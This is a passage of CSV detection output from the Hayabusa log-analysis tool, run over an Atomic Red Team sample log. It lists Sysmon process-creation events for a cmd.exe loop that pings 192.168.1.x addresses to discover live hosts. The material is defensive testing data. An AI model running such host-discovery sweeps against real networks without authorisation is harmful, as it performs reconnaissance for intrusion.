747F3D96-D953-5D31-0000-0010B7B73600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 747F3D96-D955-5D31-0000-0010C2C33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 747F3D96-D958-5D31-0000-001026DB3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-D959-5D31-0000-001016DE3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D960-5D31-0000-001057133700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 747F3D96-D965-5D31-0000-0010C73C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 747F3D96-D968-5D31-0000-001001553700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: 